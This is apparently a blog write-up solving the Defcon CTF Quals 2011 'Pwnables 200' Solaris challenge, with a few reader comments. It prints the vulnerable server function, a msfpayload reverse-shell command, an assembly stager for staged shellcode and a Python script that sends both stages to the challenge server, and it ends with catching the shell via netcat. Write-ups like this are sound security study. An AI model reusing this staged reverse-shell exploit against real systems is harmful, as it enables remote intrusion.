Defcon CTF Quals 2011 – Pwnables 200

This challenge was on remote exploiting. The binary is for SunOS (Solaris).

binary

Summary: shellcoding challenge

The program is a simple forking tcp server with the following client callback function:

int __cdecl client_callback(int fd)
{
  int n;
  char buf[4];
  void (*shellcode)(void); // [sp+18h] [bp-20h]@1
  ...
  shellcode = buf + 1;
  n = read_bytes(fd, buf, 73);
  printf("read %d bytes\n\n\n", n);
  shellcode();
  return 0;
}

Ok we have 72 bytes for shellcode, let’s look at metasploit’s reverse_tcp_shell:

$ msfpayload solaris/x86/shell_reverse_tcp LHOST=1.3.3.7 \
                                    LPORT=3123 R>payload
$ wc payload
 0  3 91 payloadtest

Ohhh, 91 byte. Too many… We need staged shellcode. Let’s write a small one, which reads another shellcode and executes it. A good thing is that we can get socket descriptor from the stack – it’s first argument for the client_callback so it’s at [ebp+8]. Also we can use function read_bytes(...):

use32

mov esi, ebp             ; place for shellcode

push 0x7f                ; len
push esi                 ; buffer
push dword [ebp + 8]     ; socket fd
call far ptr 0x08051104  ; read_bytes

call esi      ; call shellcode

Compile it with fasm and send to server:

SC1 = open("sh.bin").read().rjust(73, "\x90")
SC2 = open("payload").read()

f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect(("140.197.212.184", 5555))
f.send(SC1)
time.sleep(1)
f.send(SC2)

Then catch a shell with listening netcat and get the key.

The flag: wh0thefuck_USES_solarisanyway?!

4 comments

Skip to comment form

    • kloppers on June 6, 2011 at 22:19
    • Reply

    Hi,
    Thanks for the walk though, ive just got one question… how do you reverse a binary to C code ?

  1. IDA with hexrays :) And then renaming and retyping vars and funcs with guessing/analyzing

    • kloppers on June 6, 2011 at 23:04
    • Reply

    Thanks for your response , gotta get myself a copy.Cheers

  2. @hellman you damn pirate! :D

Leave a Reply

Your email address will not be published.